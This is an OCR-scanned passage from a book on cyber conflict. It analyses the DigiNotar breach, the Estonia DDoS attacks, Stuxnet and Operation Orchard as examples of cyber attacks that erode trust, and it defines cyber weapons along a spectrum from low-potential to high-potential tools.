protects civil liberties online. 40 By Monday, Internet Explorer, Firefox, 
and Chrome had been updated, and patched versions rejected all of 
DigiNotar’s certificates and displayed a warning to the user. “Browser 
makers Google, Mozilla and Microsoft subsequently announced that 
they would permanently block all digital certificates issued by DigiNo- 
tar, suggesting a complete loss of trust in the integrity of its service,” 
Wired magazine reported. The affair, and the Dutch certificate authori¬ 
ty’s handling of the breach, fatally undermined the trust that its users 
and customers had placed in the firm. The Dutch Ministry of the Inte¬ 
rior even went so far as to announce that the government of the Nether¬ 
lands was no longer able to guarantee that it was safe to use its own 
websites. On 20 September 2011, DigiNotar’s owner, VASCO, 
announced that the company was bankrupt. 

The hack was highly significant. It enabled a deluge of second-order 
attacks. When a certificate is used, the browser sends a request to a res¬ 
ponding server at the certificate issuing company by using a special 
Internet protocol, the Online Certificate Status Protocol, or OCSP, to 
obtain a certificate’s revocation status. The protocol reveals to the res¬ 
ponder that a particular network host is using a particular certificate at 
a particular time. The first fake *.google.com certificate status request 
came on 27 July, seventeen days after the certificate had been issued. A 
week later, on 4 August, the numbers of requests to DigiNotar’s OCSP 
responders “massively” surged, the official investigation found. The 
affected users, Google reported, were mostly in Iran. 41 The suspicion was 
that Iranian dissidents, many of whom trusted Google for secure com- 
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munications, had been targeted in the attack. 42 Around 300,000 unique 
IPs requesting access to Google were identified, with more than 99 per 
cent coming from Iran. Those that did not come from Iran were mainly 
due to Iranian users hiding behind a proxy server abroad. This means 
that somebody in Iran was trying to spy on more than a quarter of a 
million users in a very short period of time. 43 The question of who that 
somebody was remains unanswered. The initial attack on DigiNotar 
may be the work of a single hacker. The infamous Comodo blacker, 
named after an earlier attack on a company called Comodo, described 
himself as a 21-year-old student of software engineering in Tehran—and 
a pro-establishment patriot. 44 In an interview with The New York Times 
shortly after the notorious attack, he claimed to revere Ayatollah Ali 
Khamenei and despise Iran’s dissident Green Movement. Comodo Hac¬ 
ker chose that particular certificate authority from a larger list of such 
companies because it was Dutch, he told the TimesN The allegedly 
angry student blamed the Dutch government for the murder of more 
than 8,000 Muslims in Srebrenica in 1995 during the Bosnian War: 

When Dutch government, exchanged 8000 Muslim for 30 Dutch soldiers 
and Animal Serbian soldiers killed 8000 Muslims in same day, Dutch 
government have to pay for it, nothing is changed, just 16 years has been 
passed. Dutch government’s 13 million dollars which paid for DigiNotar 
will have to go directly into trash, it’s what I can do from KMs [kilometers] 
away! It’s enough for Dutch government for now, to understand that 1 
Muslim soldier worth 10000 Dutch government. 46 

This justification is somewhat dubious. It is more likely that DigiNo¬ 
tar simply offered “low-hanging fruit,” a term malware experts often use 
when referring to easy-to-pick and obvious targets. An audit immedia¬ 
tely after the hack found that the compromised firm lacked even basic 
protection: it had weak passwords, lacked anti-virus shields, and even 
up-to-date security patches. What the industry calls “bad hygiene” 
enabled the consequential breach. As late as 30 August, F-Secure, a 
cutting-edge Finnish security firm, discovered several defacements to 
less often visited parts of DigiNotar’s website, some of which were more 
than two years old and related to older hacks committed by other 
groups. 47 It is therefore likely that DigiNotar had a reputation for being 
an easy target among hackers. The question of whether or not the hac¬ 
ker acted on his own initiative is of secondary importance. The online 
vigilante openly admitted that he shared his information with the Ira- 
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nian government. “My country should have control over Google, 
Skype, Yahoo, etc.,” the alleged Comodo Hacker told The New York 
Times by email. “I’m breaking all encryption algorithms and giving 
power to my country to control all of them.” It is highly likely that the 
spying surge after 4 August was the result of Iranian government agen¬ 
cies or their representatives, possibly ISPs, spying on unsuspecting 
citizens using Gmail, an email service popular among techy users for its 
high security standards. 

The DigiNotar case offers a triple example of how cyber attacks can 
undermine trust: first, the trust in the Dutch certificate authority Digi¬ 
Notar was fatally destroyed, leading straight to bankruptcy for the 
company. Secondly, because the Dutch government relied on the com¬ 
pany’s credibility, its own trustworthiness received a temporary hit, 
which the Ministry of the Interior tried to limit by being transparent 
about the crisis. 

A second example also involves a joint public-private target set, the 
infamous cyber attacks against Estonia’s government and some private 
sector companies in May 2007. The perpetrators, likely Russians with a 
political motivation, most certainly did not anticipate the massive res¬ 
ponse and high public visibility that their DDoS attacks received. Esto¬ 
nia’s political leadership was taken aback by the attack and scrambled for 
an appropriate response, both practical and conceptual. “The attacks 
were aimed at the essential electronic infrastructure of the Republic of 
Estonia,” said Jaak Aaviksoo, then Estonia’s new minister of defense: 

All major commercial banks, telcos, media outlets, and name servers—the 
phone books of the Internet—felt the impact, and this affected the majo¬ 
rity of the Estonian population. This was the first time that a botnet 
threatened the national security of an entire nation. 48 

One of the questions on Aaviksoo’s mind at the time was if he should 
try to invoke Article 5 of the North Atlantic Treaty, which guarantees a 
collective response to an armed attack against any NATO country. Ulti¬ 
mately that was not an option as most NATO states did not see a cyber 
attack as an “armed attack,” not even in the heat of the three-week crisis. 
“Not a single Nato defence minister would define a cyber-attack as a 
clear military action at present,” Aarviksoo conceded, adding: “However, 
this matter needs to be resolved in the near future.” 49 One Estonian 
defense official described the time leading up to the launch of the attacks 
as a “gathering of botnets like a gathering of armies.” 50 Other senior 
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ministers shared his concern. Estonia’s foreign minister at the time of the 
attack was Urmas Paet. From the start, he pointed the finger at the 
Kremlin: “The European Union is under attack, because Russia is attac¬ 
king Estonia,” he wrote in a statement on 1 May 2007, and added: “The 
attacks are virtual, psychological, and real.” 51 Ansip, the prime minister, 
was already quoted above: “What’s the difference between a blockade of 
harbors or airports of sovereign states and the blockade of government 
institutions and newspaper web sites?” 52 Ene Ergma, the speaker of the 
Estonian parliament with a PhD from Russia’s Institute of Space 
Research, preferred yet another analogy. She compared the attack to the 
explosion of a nuclear weapon and the resulting invisible radiation. 
“When I look at a nuclear explosion and the explosion that happened 
in our country in May,” Ergma told Wired magazine, referring to the 
cyber attack, “I see the same thing. Like nuclear radiation, cyber warfare 
doesn’t make you bleed, but it can destroy everything.” 53 The panic was 
not confined to the small Baltic country. In the United States, hawkish 
commentators were alarmed at what they saw as a genuine, new, and 
highly dangerous threat. Ralph Peters, a retired Army intelligence officer 
and prolific hawkish commentator, published a red-hot op-ed in Wired 
two months after the Estonia attack. Lie accused the Department of 
Defense of underestimating a novel and possibly devastating new threat: 

[T]he Pentagon doesn’t seem to fully grasp the dangerous potential of this 
new domain of warfare. If you follow defense-budget dollars, funding still 
goes overwhelmingly to cold war era legacy systems meant to defeat Soviet 
tank armies, not Russian e-brigades. 54 

The United States could face a devastating surprise attack, Peters held, 
an attack that could make Pearl Harbor look like “strictly a pup-tent 
affair,” he wrote, borrowing an expression from Frank Zappa’s song 
“Cheepnis.” 

In hindsight, these comparisons and concerns may appear overblown 
and out of sync with reality. But they should not be dismissed as hyper¬ 
bole too easily. Aaviksoo’s and Ansip’s and Peters’s concerns were genuine 
and honest—they are expressions of a successful erosion of trust in pre¬ 
vious security arrangements. It is important to point out—especially 
against the background of all these martial analogies—that both the 
DigiNotar hack and the Estonian DDoS were non-violent. Yet they 
effectively undermined public trust in a company and in a country’s 
ability to cope with a new problem. In the one case the erosion of trust 
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was terminal (DigiNotar filed for bankruptcy); in the other case it was 
temporary; a few years after the attack Estonia had better defenses, bet¬ 
ter staff, and excellent skills and expertise on how to handle a national 
cyber security incident. 

Therefore, thirdly, examining the only possibly violent cyber attack to 
have taken place in the wild—Stuxnet—is instructive. 55 Even this one 
cyber attack that created a certain amount physical destruction, albeit 
directed against technical equipment, had a strong psychological ele¬ 
ment. It was intended to undermine trust, the trust of scientists in their 
systems and in themselves, and the trust of a regime in its ability to 
succeed in its quest for nuclear weapons. When Stuxnet started success¬ 
fully damaging the Iranian centrifuges, the Iranian operators did not 
know what was happening for more than two years. The operation star¬ 
ted long before Barack Obama was sworn in as president in January 
2009, possibly as early as November 2005. Independent security com¬ 
panies would discover the malicious code only in June 2010. The origi¬ 
nal intention was to cause physical damage to as many of the Iranian 
centrifuges as possible. But the American—Israeli attackers probably 
knew that the physical effect could be exploited to unleash a much more 
damaging psychological effect: “The intent was that the failures should 
make them feel they were stupid, which is what happened,” an American 
participant in the attacks told The New York Times? b The rationale was 
that once a few machines failed, the Iranian engineers would shut down 
larger groups of machines, so-called “stands” that connected 164 centri¬ 
fuges in a batch, because they distrusted their own technology and 
would suspect sabotage in all of them. In the International Atomic 
Energy Agency, a powerful UN watchdog organization based in Vienna, 
rumors circulated that the Iranians had lost so much trust in their own 
systems and instruments that the management in Natanz, a large nuclear 
site, had taken the extraordinary step of assigning engineers to sit in the 
plant and radio back what they saw to confirm the readings of the ins¬ 
truments. 57 Such confusion would be useful to the attackers: “They 
overreacted,” one of the attackers revealed, “And that delayed them even 
more.” 58 The Iranians working on the nuclear enrichment program 
began to assign blame internally, pointing fingers at each other, even 
firing people. Stuxnet, it turned out, was not a stand-alone attack against 
the self-confidence of Iranian engineers. It is important to note that the 
Stuxnet operation was probably designed to remain entirely clandestine. 
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The best trust-eroding effect would have been achieved if Iran’s engineers 
and leaders had not realized that their work was being sabotaged at all. 
The most effective cyber attacks may be those that remain entirely secret. 

A most curious follow-on cyber assault occurred on 25 July 2012, and 
provides an insightful fourth example of undermining trust. A rather 
unusual type of attack struck two of Iran’s uranium enrichment plants: 
some computers shut down, while others played “Thunderstruck,” an 
aggressive and energetic song by the Australian rock band AC/DC. An 
Iranian scientist based at the Atomic Energy Organization of Iran, 
AEOI in short, had taken the initiative and reached out to Mikko Hyp- 
ponen, the prominent and highly respected head researcher of the Fin¬ 
land-based anti-virus company F-Secure. Hypponen confirmed that the 
emails came from within the AEOI: 

I am writing you to inform you that our nuclear program has once again 
been compromised and attacked by a new worm with exploits which have 
shut down our automation network at Natanz and another facility Fordo 
near Qom. 59 

F-Secure couldn’t confirm any details mentioned in the email. The 
anonymous Iranian scientists apparently quoted from an internal email 
that the organization’s “cyber experts” had sent to the teams of scientists. 
The email mentioned a common tool for finding vulnerabilities and 
developing exploit code, Metasploit, and that the mysterious attackers 
allegedly had access to the AEOI’s virtual private network (VPN). The 
attack, the scientist volunteered, shut down “the automation network 
and Siemens hardware.” He then revealed the most curious element that 
hundreds of media articles had seized on after Bloomberg first reported 
the news of the email published on F-Secure’s blog: 

There was also some music playing randomly on several of the worksta¬ 
tions during the middle of the night with the volume maxed out. I believe 
it was playing “Thunderstruck” by AC/DC. 60 

Some caution is in order. The only report from the episode comes 
from an Iranian scientist who volunteered this information to an anti¬ 
virus company. It is also unclear if the attack should be seen as the latest 
incident in a series of US-designed cyber attacks that may have started 
with Stuxnet. At first glance, literally blasting an attack in the face of the 
Iranian engineers stands in stark contrast to clandestine attacks like 
Stuxnet or Flame, which were sophisticated pieces of spying software— 


33 


CYBER WAR WILL NOT TAKE PLACE 


but then, maybe the attackers didn’t expect news of the AC/DC blast to 
leak out, embarrassing the Iranians publicly. So either way it was not a 
surprise when Pereydoun Abbasi, the head of the AEOI, disputed the 
attack a few days later: “Who seriously believes such a story? It is baseless 
and there has never been such a thing,” Abbasi said in a statement to the 
Iranian ISNA news agency. 61 The story may well be a hoax. But it should 
not be dismissed out of hand. AC/DC, after all, seem to be a favorite 
soundtrack for American warriors in battle; during the war in neighbo¬ 
ring Iraq in 2004, for example, the Marines blasted into Pallujah to the 
loud riffs of AC/DC’s “Hells Bells.” 62 It would be plausible to assume 
that the operation was part of a larger psychological campaign of attri¬ 
tion, designed to undermine the Iranian engineers’ trust in their systems, 
their skills, and their entire project, in a blow-by-blow fashion. News 
consumers in Europe or the United States may not seriously believe such 
a story—but Abbasi’s engineers, if it happened, would certainly wonder 
what else the mysterious attackers were able to do, after yet another 
entirely unpredicted attack hit their systems. 

Violence administered through weaponized code, in sum, is limited 
in several ways: it is less physical, because it is always indirect. It is less 
emotional, because it is less personal and intimate. The symbolic uses of 
force through cyberspace are limited. And, as a result, code-triggered 
violence is less instrumental than more conventional uses of force. Yet, 
despite these limits, the psychological effects of cyber attacks, their uti¬ 
lity in undermining trust, can still be highly effective. 

This chapter opened by asking if the Israeli cyber attack on the Syrian 
air defense system in August 2007 was violent or not. Against the back¬ 
ground of this analysis, the answer is clear: it was not violent. Only the 
combined airstrike on the soon-to-be-finished nuclear reactor was vio¬ 
lent. But the cyber attack on its own achieved two effects that previously 
would have required a military strike: first, it neutralized the threat of 
the Syrian air defense batteries. This was a significant achievement that 
enabled a stealthier and possibly faster and more successful air incursion. 
But the second effect is possibly even more significant: the cyber attack 
helped undermine the Syrian regime’s trust in its own capabilities and 
the belief that it could defend its most critical installations against future 
Israeli attacks. Bashar al-Assad’s government subsequently decided not 
to restart Syria’s enrichment program, so this second less tangible result 
may have had the more sustainable effect. 
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In the days and hours leading up to the afternoon of 19 March 2011, 
air force planners in France, Britain, and several other NATO countries 
were frantically preparing an imminent bombing campaign against mili¬ 
tary targets in Libya. In Washington on that same March weekend an 
unusual discussion took place between the Department of Defense and 
the White House. Should America deploy its cyber arsenal against 
Libya’s air defense system? 1 After the Pentagon’s generals and geeks had 
briefed the president on the options, he ultimately decided that the time 
was not ripe for cyber weapons. 

This behind-the-scenes episode is part of a much larger debate about 
offensive cyber weapons. In September 2011, William Lynn, the US 
Deputy Secretary of Defense, warned, “If a terrorist group does obtain 
destructive cyberweapons, it could strike with little hesitation.” 2 In 
January 2012, the Department of Defense announced its plans to equip 
America’s armed forces for “conducting a combined arms campaign 
across all domains—land, air, maritime, space, and cyberspace.” 3 To 
counter a novel arms race, China and Russia, among others, have sug¬ 
gested discussing forms of “cyber arms control” to restrict new forms of 
military conflict in cyberspace. 

But the debate and those trying to turn it into policy are getting 
ahead of themselves. Some fundamental questions on the use of force in 
cyberspace are still unanswered; worse, they are still unexplored: what 
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are cyber “weapons” in the first place? How is weaponized code different 
from physical weapons? What are the differences between various cyber 
attack tools? And do the same dynamics and norms that govern the use 
of weapons on the conventional battlefield apply in cyberspace? 

Cyber weapons span a wide spectrum. That spectrum, this chapter 
argues, reaches from generic but low-potential tools to specific but high- 
potential weaponry. A didactically useful comparison helps illustrate this 
polarity. Low-potential “cyber weapons” resemble paintball pistols: they 
may be mistaken for real weapons, they are easily and commercially 
available, used by many to “play,” and getting hit is highly visible—but 
at closer inspection these “weapons” will lose some of their threatening 
character. High-potential cyber weapons could be compared with 
sophisticated fire-and-forget weapon systems such as modern anti-radar 
missiles: they require specific target intelligence that is programmed 
into the weapon system itself, notable investments for R&D, significant 
lead-time, and while they open up entirely new tactics they also create 
novel limitations. This distinction brings into relief a two-pronged 
hypothesis that stands in stark contrast to some of the debate’s received 
wisdoms. Maximizing the destructive potential of a cyber weapon is 
likely to come with a double effect: it will significantly increase the 
resources, intelligence, and time required to build and to deploy it— 
and increasing a cyber weapon’s potential is likely to decrease signifi¬ 
cantly the number of targets, the risk of collateral damage, and the 
coercive utility of cyber weapons. 

The chapter’s argument is presented in three steps. The chapter begins 
by outlining what cyber weapons are in conceptual terms. Then I sug¬ 
gest a way to class cyber attack tools by discussing the most important 
empirical cases on record. Thirdly the chapter explores why even some 
sophisticated and effective instruments of electronic attack cannot sen¬ 
sibly be called a cyber weapon. The chapter closes by pointing out how 
cyber weapons confront us with three problems. These three problems 
will largely define the future development and use of weaponized code. 

Weapons are, simply put, instruments of harm. Since the dawn of 
time, humans have used weapons to hunt prey and each other. Weapons 
range from the nuclear warhead to the bare human body trained in 
martial arts, their utility ranging from destroying an entire city to pro¬ 
tecting one single person. Yet practitioners as well as scholars often seem 
to take the meaning of the term “weapon” for granted. Remarkably, even 
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the US Department of Defense Dictionary of Military and Associated 
Terms, an authoritative 550-page compendium that defines anything 
from abort to Zulu time, has no definition for weapon, let alone for cyber 
weapon. 4 For the purposes of this book, a weapon can be defined as a 
tool that is used, or designed to be used, with the aim of threatening or 
causing physical, functional, or mental harm to structures, systems, or living 
things. This general definition is an essential building block for deve¬ 
loping a more precise understanding of cyber weapons. 

The term cyber weapon is much broader than cyber war. Cyber war 
is a highly problematic, even a dangerous, concept. An act of war must 
be instrumental, political, and potentially lethal, whether in cyberspace 
or not. 5 No stand-alone cyber offense on record meets these criteria, so 
“cyber war” remains a metaphor for the time being. Not so in the case 
of cyber weapons. Weapons are not just used in war. Arms are used for 
a wide range of purposes: to threaten others, for self-defense, to steal, to 
protect, to blackmail, to police, to break into buildings, to enforce the 
law, to flee, to destroy things, and even to train, to hunt, and for sports 
and play. Weapons, of course, may also be used to make war, and some 
more complex weapons systems are exclusively developed for that 
purpose, for instance warships or anti-aircraft guns. But most weapons 
are neither designed for warfare nor used in wars. This is true also for 
cyber weapons. Therefore, while it is counterproductive and distracting 
to speak about cyber war, it can be productive and clarifying to speak 
about cyber weapons. Yet conceptual precision remains a problem— 
“There is currently no international consensus regarding the definition 
of a ‘cyber weapon’,” lamented the Pentagon in November 2011, ele¬ 
gantly distracting from the problem that there is no consensus inside the 
DoD either. 6 For the purposes of this book, a cyber weapon is seen as a 
subset of weapons more generally: as computer code that is used, or desig¬ 
ned to be used, with the aim of threatening or causing physical, functional, 
or mental harm to structures, systems, or living beings. 

A psychological dimension is a crucial element in the use of any 
weapon, but especially so in the case of a cyber weapon, in two ways: 
the first psychological dimension is the offender’s intention to threaten 
harm or cause harm to a target. An instrument may be expressly designed 
as a weapon, like a rifle, or repurposed for use as a weapon, as in using 
a hammer to threaten or hit somebody. 7 Simple as well as complex 
products can be used both for peaceful purposes and as arms. In the 
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case of sole-purpose weapon systems as well as in the case of repurposed 
items, a tool is actually used as a weapon when an actor is intending to 
use it as such, whether harm is successfully inflicted or not is of secon¬ 
dary concern. A rifle, for instance, may be used to threaten; it may 
malfunction; or the bullet may miss the target. But in all cases the arm 
has been used because an attacker was intending to use it as such in a 
given situation. 

The same logic applies to cyber weapons. An illustration of this is a 
remarkable event that took place at the Sayano-Shushenskaya hydroe¬ 
lectric plant in Russia. Keith Alexander, a general at the head of Ameri¬ 
cas National Security Agency as well as of US Cyber Command, used 
the incident in a speech to highlight the potential risks of cyber attacks. 8 
With a height of 245 meters and a span of 1 kilometer, the Shushens- 
kaya dam is the largest in Russia, holding back the mighty Yenisei River 
in Khakassia in south-central Siberia. 9 Shortly after midnight GMT on 
17 August 2009, a 940-ton turbine, one of ten 640 megawatt turbines 
at the plant, was ripped out of its seat by a so-called water hammer, a 
sudden surge in water pressure, which then caused a transformer explo¬ 
sion. The turbine’s unusually high vibrations had eventually worn down 
the bolts that kept its cover in place. Seventy-five people died in the 
accident, energy prices in Russia rose, and rebuilding the plant will cost 
$1.3bn. The ill-fated turbine 2 had been malfunctioning for some time 
and the plant’s management was poor, but the key event that ultimately 
triggered the catastrophe seems to have been a fire at Bratsk power sta¬ 
tion, about 500 miles away. Because the energy supply from Bratsk 
dropped, the authorities remotely increased the burden on the Shus- 
henskaya plant. The sudden spike overwhelmed turbine 2, which at 
twenty-nine years and ten months had nearly reached the end of its 
predicted lifecycle of thirty years. 10 The incident would have been a 
powerful example of the use of a cyber weapon if intruders had inten¬ 
tionally caused the plant’s crash through a remote command (although 
to plan such an attack they would have required remarkably detailed 
advance knowledge of the plant’s long-standing maintenance deficien¬ 
cies). But such an intention was absent. Intention may be the only line 
separating the attack from an accident. 

A second psychological dimension comes into play if a weapon is 
used as a threat, or if its use is announced or anticipated: the target’s 
perception of the weapons potential to cause actual harm. It is important 
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to note that the attacker may use a weapon as a threat, which may 
achieve the objective without actually inflicting physical harm; or the 
attacker may use the weapon to cause harm instantly, without threate¬ 
ning to do so first. Furthermore, a victim’s estimation of a weapon’s 
potential to harm is different from a victim’s estimation of an attacker’s 
potential to harm. To illustrate all this, a fictional scenario is useful: 
suppose an armed robber enters a bank and threatens the clerk with a 
paintball pistol; both the clerk and the robber assume that the paintball 
pistol is real and loaded with live bullets; money is handed over; the 
robber flees. Has a weapon been used? Arguably the answer is yes. This 
fictitious scenario is less anomalous than it may seem; it merely affords 
starker contrasts. The history of domestic and international armed 
confrontations offers plenty of examples where the aggressor’s power to 
cause injury was vastly overestimated, both by the defender as well as by 
the aggressor. 11 The paintball pistol scenario inevitably leads to a 
seeming paradox: suppose the bank clerk noticed that the robber’s pistol 
could only shoot paintballs. Would it still be a weapon? The answer is 
no. The fake firearm would have lost its threatening character and have 
thus ceased to be a weapon, even if the robber still believed it to be real. 
The conclusion: a weapon’s utility critically depends on the perception 
of the threatened party. In every real armed confrontation, both the 
victim and the aggressor will hold crude theories of an arm’s capability 
to inflict harm and their own ability to withstand or absorb this harm. 
These subjective estimates will necessarily vary in their accuracy when 
put to a violent test. The actual weapon may be more or less powerful 
than assumed. In the case of cyber weapons, this discrepancy is espe¬ 
cially large: publicly known cyber weapons have far less firepower than 
is commonly assumed. 

Cyber weapons can be grouped along a spectrum: on the generic, 
low-potential end of the spectrum is malicious software—malware— 
that is able to influence a system merely from the outside but which is 
technically incapable of penetrating that system and creating direct 
harm—resembling the proverbial paintball pistol. On the specific, high- 
potential end of the spectrum is malware able to act as an intelligent 
agent—capable of penetrating even protected and physically isolated 
systems and autonomously influencing output processes in order to inflict 
direct harm, thus resembling the proverbial fire-and-forget smart-bomb. 
In between are malicious intrusions that include generic system penetra- 
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tions incapable of identifying and influencing a targeted process, but 
also targeted and specific intrusions capable of creating functional and 
even physical damage. 

On the low-potential end of the spectrum is the paintball pistol effect. 
Software used to generate traffic to overload a server, for instance, is not 
strictly speaking physically or functionally damaging a living being, a 
structure, or a system; it is only temporarily slowing down or shutting 
down a system, without damaging it directly and immediately. Denial 
of service (DoS) attacks are easy to mount and relatively easy to defend 
against, but they are also highly visible—and for those who find them¬ 
selves for the first time at the receiving end of an attack that is distribu¬ 
ted for better effect across multiple attacking machines the experience 
can be distressing, and it may well create mental harm and even 
second-order damage: a persistent high-volume Distributed Denial of 
Service (DDoS) attack which may bring down a bank’s website for an 
extended period of time; defaced websites which may seriously damage 
an organization’s reputation; and espionage or intellectual property 
theft that can put a company in a less advantageous market position. 
But these forms of damage are second-order effects, not direct damage 
inflicted by a cyber weapon. 12 At closer inspection, the “weapon” ceases 
to be a weapon. 

One example is Estonia’s reaction to a large DDoS attack in late April 
2007, which was discussed earlier. The real-life effect of the Russian- 
coordinated online protests on business, government, and society was 
noticeable, but ultimately it remained relatively minor. Yet at the time, 
Estonian officials and citizens were genuinely scared by the attack. 

At the opposite, high-potential end of the spectrum is the proverbial 
fire-and-forget missile. A useful military analogy is the high-speed anti¬ 
radar missile, usually shortened to E1ARM, initially produced by Texas 
Instruments, and which is one of the most widely deployed anti-radar 
weapons worldwide. The missile’s critical innovation is a seeker that 
includes an intelligent, programmable video processor, designed to 
recognize characteristic pulse repetition frequencies of enemy radars. 
This means that the weapon can be launched into a certain area where 
it then searches for suitable target radars, discriminating between frien¬ 
dly and hostile radar by band. Once an emitter is identified as hostile, 
the missile software’s decision logic will allow it to select the highest 
value target and home to impact. The missile can be seen as an intelli- 
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gent agent. In computer science, intelligent agents are autonomous 
software entities that are able to assess the environment they find them¬ 
selves in, and which are capable of reacting autonomously in order to 
achieve a predefined goal. Such a quality is necessary to attack the most 
highly prized targets. 

The proverbial HARM missile contrasts with proverbial paintball 
pistols in at least five important ways. Firstly, its objective is not just 
interrupting traffic at a system’s ports facing the public, but getting 
inside and penetrating a system. Secondly, its objective is not just pene¬ 
trating any system that happens to be vulnerable (“low-hanging fruit” in 
geek jargon) but specific systems of particular interest. Thirdly, these 
systems are likely to be better protected. For any cyber attacker with the 
goal of causing physical damage, the prime targets are likely to be indus¬ 
trial processes, public utilities, and civilian as well as military telecom¬ 
munication networks. The computerized control systems in such 
installations tend to be better secured than less critical systems. Fourthly, 
if the goal of a stand-alone cyber attack is physical damage, rather than 
just enabling a conventional strike, then the target itself has to come 
equipped with a built-in potential for physical harm. Weaponized code, 
quite simply, doesn’t come with an explosive charge, as chapter two 
explored in detail. Potential physical damage will have to be created by 
the targeted system itself, by changing or stopping ongoing processes. 
Finally, an attack agent’s objective is likely to be not just shutting down 
a penetrated system, but subtly influencing ongoing processes in order 
to achieve a specific malicious goal. Merely forcing the shutdown of one 
industrial control system may have the undesirable effect that a fail-safe 
mechanism or a backup system kicks in, or operators start looking for 
the bug. To work as an effective weapon, the attack software may have 
to influence an active process in a malicious way, and if the malicious 
activity extends over a certain period of time this should be done in a 
stealthy way as well. But stealthily or overtly influencing an active pro¬ 
cess is far more complicated than just hitting the virtual off-button. 
Three real-world examples of weaponized code illustrate this. 

In a first, contested 13 example, the CIA may have rigged the control 
system of a Soviet pipeline in order to cause a major explosion. The 
powerful 1982 explosion was not caused by a system shutdown, but by 
deliberately creating overpressure in a gas pipeline by manipulating pres¬ 
sure-control valves in an active control process. A second example is the 
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Israeli cyber attack that was designed to blind the Syrian air defense 
system. The goal was not just to shut down the entire air-defense radar 
station—this would have been suspicious and could have triggered an 
alarm or investigation—but to trick the active system to display no 
approaching airplanes to its operators for a limited time. Thirdly, and 
most famously, the worm that sabotaged Iran’s nuclear program didn’t 
just shut down the centrifuges at Natanz. Before Stuxnet started sabota¬ 
ging ongoing processes, it intercepted input values from sensors, for 
instance the state of a valve or operating temperatures, recorded these 
data, and then provided the legitimate controller code with prerecorded 
fake input signals, while the actual processes in the hidden background 
were manipulated. 

The two latter examples need to be examined in some detail (the 
pipeline explosion was already covered in chapter one). The use ofwea- 
ponized code may happen in conjunction with conventional military 
force or may be stand-alone. One of the most spectacular examples of a 
combined strike is Operation Orchard, Israel’s bombing raid on a 
nuclear reactor site at Dayr ez-Zor in Northern Syria on 6 September 
2007. It appears that the Israeli Air Eorce prepared for the main attack 
by taking out a single Syrian radar site at Tall al-Abuad close to the 
Turkish border. The Israeli attackers combined electronic warfare with 
precision strikes. The Syrian electrical grid was not affected. Syria’s air- 
defense system, one of the most capable in the world, went blind and 
failed to detect an entire Israeli squadron of F-15I and F-161 warplanes 
entering Syrian airspace, raiding the site, and leaving again. 14 Before- 
and-after satellite pictures of the targeted site on the Euphrates were 
made public by the US government. They show that the nascent nuclear 
facility and its suspected reactor building, which were located about 145 
kilometers from Iraq, had been reduced to rubble. The coding work for 
the operation was probably done by Unit 8200, the largest unit in the 
IDF and Israel’s equivalent of the NSA. 15 The technicians may have used 
a so-called “kill switch” embedded in the air-defense system by a 
contractor to render it useless. 16 The details of the operation remain 
classified, and therefore unconfirmed. But one thing should be high¬ 
lighted here: the network attack component of Operation Orchard was 
probably critical for the success of the Israeli raid, and although the 
cyber attack did not physically destroy anything in its own right, it 
should be seen as an integrated part of a larger military operation. While 
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the cyber attack on its own—without the military component—would 
have constituted neither an act of war nor an armed attack, it was never¬ 
theless an enabler for a successful military strike. That was different in 
another, even more spectacular recent incident. 

Stuxnet is by far the most sophisticated known cyber attack to date. It 
was a highly directed attack against specific targets, Iran’s nuclear enrich¬ 
ment program at Natanz. The worm was an act of cyber-enabled stand¬ 
alone sabotage that was not connected to a conventional military 
operation. The US government’s internal codename for the operation was 
“Olympic Games.” But that name became known only after independent 
researchers had discovered and analyzed the malware’s code for many 
months, usually discussing the threat under the name Stuxnet. Stuxnet 
caught on, and therefore this book sticks to the unofficial but publicly 
better-established name (it is also more elegant). There is reason to believe 
that Olympic Games was the codename for a larger program that included 
more than just the Stuxnet attack. It was probably part of a bigger opera¬ 
tion that included at least one other publicly known intrusion software. 
What is certain is that Stuxnet was a multi-year campaign. The program 
appears to span nearly seven years, from November 2005 to June 2012. 17 
It is likely that the main attack had been executed between June 2009 and 
June 2010, when IT security companies first publicly mentioned the 
worm. Stuxnet recorded a timestamp and other system information. The¬ 
refore engineers were able, in months of hard work, to outline the worm’s 
infection history as well as to reverse-engineer the threat and to unders¬ 
tand its purpose. The following paragraphs are intended to provide a 
glimpse into Stuxnet’s complexity and sophistication. 

The sabotage software was specifically written for industrial control 
systems. These control systems are box-shaped stacks of hardware wit¬ 
hout keyboards or screens. A Programmable Logic Controller, or PLC, 
runs the control system. An industrial plant’s operators have to program 
the controllers by temporarily hooking them up to a laptop, most likely 
a so-called Field PG, a special industrial notebook sold by Siemens. 
These Field PGs, unlike the control system and the controller itself, run 
Microsoft Windows and were most likely not connected to the Internet 
or even to an internal network. 18 

The first complication for the attackers was therefore a feasible infec¬ 
tion strategy. Stuxnet had to be introduced into the target environment 
and spread there in order to reach its precise target, which was protected 
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by an “air gap,” in not being connected to the insecure Internet and even 
internal networks. As a result, it is highly likely that the infection occur¬ 
red through the use of a removable drive, such as a USB stick. The attack 
vehicle was coded in a way that allowed its handlers to connect to the 
worm through a command-and-control server. But because the final tar¬ 
get was not networked, “all the functionality required to sabotage a sys¬ 
tem was embedded directly in the Stuxnet executable,” Symantec 
observed in the updated W32. Stuxnet Dossier, an authoritative analysis of 
the worm’s code. 19 The worms injection mechanism, at least in a later 
version, had an aggressive design. The number of collateral and inconse¬ 
quential infections was large: by the end of 2010, the worm had infected 
approximately 100,000 hosts in dozens of countries, 60 per cent of which 
were in Iran. It is possible that the worm’s aggressive infection mechanism 
was intended to maximize the likelihood that it would end up on a field 
PG used to program the PLCs in Natanz. Human agents may also have 
helped infiltrate the target, willingly as well as unwillingly. 20 

A second complexity was Stuxnet’s “sabotage strategy,” in Symantec’s 
words. The worm specifically targeted two models of Siemens logic 
controllers, 6ES7-315-2 and 6ES7-417, known as code 315 and code 
417. The likely targets were the K-1000-60/3000-3 steam turbine in 
the Bushehr nuclear power plant for code 417 and the gas centrifuges in 
Natanz for code 315. 21 If the worm was able to connect to such control¬ 
lers, it proceeded to check their configurations in order to identify the 
target; if Stuxnet didn’t find the right configuration, it did nothing. But 
if it found what it was looking for, the worm started a sequence to inject 
one of three payloads. These payloads were coded to change the output 
frequencies of specific drivers that run motors. Stuxnet was thus set up 
to cause industrial processes to malfunction, physically damaging rotors, 
turbines, and centrifuges. The attack’s goal was to damage the centri¬ 
fuges slowly, thereby tricking the plant’s operators. The rationale was 
probably that damaging hardware would delay Iran’s enrichment pro¬ 
gram for a significant period of time, as the requisite components can¬ 
not easily be bought on open markets. 

This method relates to a third complexity, the worm’s stealthiness. 
